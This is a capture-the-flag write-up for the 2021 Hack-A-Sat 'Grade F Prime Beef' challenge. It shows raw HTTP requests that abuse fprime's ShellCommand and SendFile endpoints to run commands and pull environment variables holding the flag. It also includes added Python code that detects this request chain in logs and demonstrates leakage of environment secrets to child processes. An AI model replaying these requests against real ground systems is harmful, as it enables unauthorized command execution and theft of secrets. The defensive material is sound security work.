2021 Hack-A-Sat DEFCON Space Security Challenge CTF Qualifiers Writeup - Grade F Prime Beef
Welcome back to another year of HaS writeups.
Grade F Prime Beef
"Exploit the system, get the passcode, retrieve the flag."
Connecting to the target system and providing the token gave us a web GUI for fprime, a NASA open-source framework for flight software (and a shell, but it wasn't required).
This looks like an interesting framework to explore! But we're doing a CTF and we need the flag.
Helpfully, we have RCE built in as a feature: github
So we can send it a command, dump the output to a file, and downlink it (the timestamps are out of order because I'm recovering this from Burp logs and can't be bothered finding the exact flow):
PUT /commands/fileManager.ShellCommand?_no_cache=...&session=... HTTP/1.1
Host: 18.222.149.133:11782
Content-Length: 68
Content-Type: application/json
Accept: */*
Origin: http://18.222.149.133:11782
Referer: http://18.222.149.133:11782/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{"key":4276996862,"arguments":["ls -lah /home/space","/tmp/output"]}

HTTP/1.0 200 OK
Content-Type: application/json
Content-Length: 23
Server: Werkzeug/2.0.1 Python/3.7.3
Date: Sun, 27 Jun 2021 06:09:12 GMT

{"message": "success"}

PUT /commands/fileDownlink.SendFile?_no_cache=...&session=... HTTP/1.1
Host: 18.222.149.133:11782
Content-Length: 53
Content-Type: application/json
Accept: */*
Origin: http://18.222.149.133:11782
Referer: http://18.222.149.133:11782/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{"key":4276996862,"arguments":["/tmp/output","asdf"]}

HTTP/1.0 200 OK
Content-Type: application/json
Content-Length: 23
Server: Werkzeug/2.0.1 Python/3.7.3
Date: Sun, 27 Jun 2021 06:04:28 GMT

{"message": "success"}

GET /download/files/asdf HTTP/1.1
Host: 18.222.149.133:11782
Referer: http://18.222.149.133:11782/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

HTTP/1.0 200 OK
Content-Disposition: attachment; filename=asdf
Content-Length: 412
Content-Type: application/octet-stream
Last-Modified: Sun, 27 Jun 2021 06:09:34 GMT
Cache-Control: public, max-age=43200
Expires: Sun, 27 Jun 2021 18:09:36 GMT
ETag: "1624774174.3702145-412-2055932307"
Date: Sun, 27 Jun 2021 06:09:36 GMT
Server: Werkzeug/2.0.1 Python/3.7.3

uid=1000(space) gid=1000(space) groups=1000(space)
uid=1000(space) gid=1000(space) groups=1000(space)
total 28K
drwxr-x--- 1 space space 4.0K Jun 26 21:57 .
drwxr-xr-x 1 root root 4.0K Jun 26 21:57 ..
-rw-r----- 1 space space 220 Apr 18 2019 .bash_logout
-rw-r----- 1 space space 3.5K Apr 18 2019 .bashrc
-rw-r----- 1 space space 807 Apr 18 2019 .profile
drwxr-xr-x 1 space space 4.0K Jun 26 21:57 fprime
Calling 'env' was enough to retrieve the flag:
MAIL=/var/mail/space
USER=space
SHLVL=0
HOME=/home/space
OLDPWD=/home/space
LOGNAME=space
_=./satellite.exe
PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
SAT_FLAG=ThisIsNotTheFlagYouAreLookingFor
SHELL=/bin/bash
PWD=/home/space/fprime
FLAG=flag{yankee...}
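From the defender's side, the three-request chain above (ShellCommand, SendFile, then a GET on /download/files/) is a clean signature for "arbitrary command run and its output pulled off the box" through the GDS web endpoints. The following is an added example, not code from the original post or from the fprime project: it scans constructed, combined-log-style access-log lines (the sample lines, client IPs and session values are made up; the endpoint paths are the ones shown in the requests above), flags every ShellCommand call on its own, and additionally reports clients that complete the full exfiltration chain in order.

```python
"""Flag fprime GDS ShellCommand use and the ShellCommand -> SendFile -> download chain.

Added example (not from the writeup or from fprime). The access-log format is an
assumed combined-log layout; adjust LINE_RE to your proxy or web server.
"""
import re
from collections import defaultdict

# Constructed sample access-log lines; not real traffic from the challenge.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Jun/2021:06:09:12 +0000] "PUT /commands/fileManager.ShellCommand?_no_cache=1&session=abc HTTP/1.1" 200 23
10.0.0.5 - - [27/Jun/2021:06:09:20 +0000] "PUT /commands/fileDownlink.SendFile?_no_cache=1&session=abc HTTP/1.1" 200 23
10.0.0.5 - - [27/Jun/2021:06:09:36 +0000] "GET /download/files/asdf HTTP/1.1" 200 412
10.0.0.9 - - [27/Jun/2021:06:10:00 +0000] "GET /channels HTTP/1.1" 200 1024
10.0.0.9 - - [27/Jun/2021:06:11:00 +0000] "PUT /commands/fileDownlink.SendFile?session=xyz HTTP/1.1" 200 23
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Stages of the exfiltration chain, in the order they must occur per client.
STAGES = (
    ("PUT", "/commands/fileManager.ShellCommand"),
    ("PUT", "/commands/fileDownlink.SendFile"),
    ("GET", "/download/files/"),
)


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]  # drop _no_cache/session query string
    return rec


def stage_of(method, path):
    """Return the chain stage index this request belongs to, or None."""
    for idx, (m, prefix) in enumerate(STAGES):
        if method == m and path.startswith(prefix):
            return idx
    return None


def scan(log_text):
    """Return (shell_commands, chains).

    shell_commands: every (ip, timestamp) that invoked fileManager.ShellCommand;
                    each of these is arbitrary command execution by itself.
    chains:         client IPs that completed all three stages in order.
    """
    progress = defaultdict(int)  # ip -> index of the next expected stage
    shell_commands = []
    chains = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        stage = stage_of(rec["method"], rec["path"])
        if stage is None:
            continue
        if stage == 0:
            shell_commands.append((rec["ip"], rec["ts"]))
        if stage == progress[rec["ip"]]:
            progress[rec["ip"]] += 1
            if progress[rec["ip"]] == len(STAGES):
                chains.append(rec["ip"])
                progress[rec["ip"]] = 0
    return shell_commands, chains


if __name__ == "__main__":
    calls, full_chains = scan(SAMPLE_LOG)
    for ip, ts in calls:
        print(f"ALERT ShellCommand from {ip} at {ts}")
    for ip in full_chains:
        print(f"ALERT command-output exfiltration chain completed by {ip}")
```

The second client in the sample only calls SendFile, so it is not reported as a chain; in a real deployment a SendFile without a preceding ShellCommand is still worth a lower-severity look, since it downlinks any file the GDS user can read.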
Was this a mistake?
This challenge was in the RE category and had a binary, /home/space/fprime/satellite.exe, which we obtained, noted it was getting the flag from env vars, and so bypassed the requirement to get the passcode from the binary. Perhaps they didn't mean to leave the RCE feature enabled? It likely could have been copied out of /proc/pid/environ as well?
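The underlying reason 'env' worked is that anything spawned by the flight software, including a ShellCommand, inherits the parent's environment, so a secret handed to satellite.exe through an environment variable is readable by every child. The following added example (not from the writeup, not from fprime; the variable name SAT_FLAG_DEMO and its value are constructed) shows the leak with a Python child process, the usual mitigation of reading the secret once and scrubbing it from the mapping used for children, and a Linux-only check of the /proc/self/environ point raised above.

```python
"""Environment-variable secrets leak to child processes; read once, then scrub.

Added example, not from the original post or from fprime. SAT_FLAG_DEMO is a
constructed variable name standing in for the challenge's FLAG variable.
"""
import os
import subprocess
import sys

SECRET_VAR = "SAT_FLAG_DEMO"
DEMO_VALUE = "constructed-demo-value"


def child_sees(env):
    """Spawn a child with the given environment (as a ShellCommand handler would)
    and report whether the secret is visible to it."""
    code = f"import os; print(os.environ.get('{SECRET_VAR}', ''))"
    out = subprocess.run(
        [sys.executable, "-c", code], env=env, capture_output=True, text=True, check=True
    ).stdout.strip()
    return out != ""


def load_secret_and_scrub(environ):
    """Read the secret once at startup and return (secret, env_without_secret).

    The scrubbed mapping is what every later subprocess call should be given.
    """
    secret = environ.get(SECRET_VAR)
    scrubbed = {k: v for k, v in environ.items() if k != SECRET_VAR}
    return secret, scrubbed


def proc_environ_still_has_secret(env):
    """Linux only: start a child that unsets the variable and then reads
    /proc/self/environ. The kernel reports the environment as it was at exec,
    so unsetenv in the running process does not hide the value from /proc.
    Returns None where /proc/self/environ is unavailable."""
    if not os.path.exists("/proc/self/environ"):
        return None
    code = (
        "import os, sys\n"
        f"os.environ.pop('{SECRET_VAR}', None)\n"
        "data = open('/proc/self/environ', 'rb').read()\n"
        f"sys.stdout.write('yes' if b'{SECRET_VAR}=' in data else 'no')\n"
    )
    out = subprocess.run(
        [sys.executable, "-c", code], env=env, capture_output=True, text=True, check=True
    ).stdout.strip()
    return out == "yes"


def demo():
    """Return (leaky, safe, secret): whether an unscrubbed child sees the secret,
    whether a scrubbed child sees it, and the value the parent kept."""
    parent_env = os.environ.copy()
    parent_env[SECRET_VAR] = DEMO_VALUE          # simulate the launcher setting it
    leaky = child_sees(parent_env)               # inherits everything -> True
    secret, scrubbed = load_secret_and_scrub(parent_env)
    safe = child_sees(scrubbed)                  # scrubbed mapping -> False
    return leaky, safe, secret


if __name__ == "__main__":
    leaky, safe, secret = demo()
    print(f"unscrubbed child sees secret: {leaky}")
    print(f"scrubbed child sees secret:   {safe}")
    print(f"/proc/self/environ after unsetenv still holds it: "
          f"{proc_environ_still_has_secret({**os.environ, SECRET_VAR: DEMO_VALUE})}")
```

Scrubbing the mapping passed to children is the cheap fix; it does not help against /proc/pid/environ of the original process, which is why secrets are better delivered through a file with restrictive permissions or a descriptor that is read and closed at startup rather than through the environment.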